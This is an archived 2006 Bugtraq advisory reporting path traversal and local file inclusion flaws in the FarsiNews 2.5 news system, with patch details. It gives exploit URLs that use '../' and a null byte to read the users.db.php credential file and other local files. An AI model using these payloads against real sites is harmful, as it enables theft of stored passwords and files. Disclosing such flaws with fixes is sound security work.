lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060210135230.53521.qmail@web33213.mail.mud.yahoo.com>
Date: Fri, 10 Feb 2006 05:52:30 -0800 (PST)
From: h e <het_ebadi@...oo.com>
To: bugtraq@...urityfocus.com
Subject: FarsiNews 2.5 Multiple Vulnerabilities


FarsiNews 2.5 Multiple Vulnerabilities

FarsiNews is a News Publishing System That uses Flat
files to store it`s Datas... Farsinews is a persian
and improved translation of CuteNews, AjFork, CuteHack
and CuteSQL...
for more information about FarsiNews Publishing System
visit http://www.farsinewsteam.com

Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team) : admin@...id.ir.
The original article can be found at :
http://hamid.ir/security

Vulnerable Systems:
    FarsiNews 2.5 and below (also tested on 2.1)

1)
in FarsiNews if you change the archive value :
http://localhost/index.php?archive=hamid
----------------------------[<error>]---------------------------
Warning:
file([PATH]/data/archives/hamid.news.arch.php): 
failed to open stream: No such file or directory in
[PATH]\inc\shows.inc.php on line 642
Warning:
file([PATH]/data/archives/hamid.comments.arch.php):
failed to open stream: No such file or directory in
[PATH]\inc\shows.inc.php on line 686
...[and many other error]
----------------------------[</error>]---------------------------

it means that shows.inc.php  try to open 
'/archives/hamid.news.arch.php'  (and also
'hamid.comments.arch.php')  to read it's data .
we can change the archive value to
'/../users.db.php%00' to see all username and password
.
Exploit :
http://localhost/index.php?archive=/../users.db.php%00
http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00

2)
Local file inclusion:

The following URL will cause local  file inclusion:
http://localhost/show_archives.php?template=/../../[local-file]%00

farsinews team Patch:
use FarsiNews 2.5.3
and upgrade :
show_news.php
show_archives.php
inc/tempeditor.mdu
more info :
http://forum.farsinewsteam.com/index.php?showtopic=71
http://forum.farsinewsteam.com/index.php?showtopic=76


Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ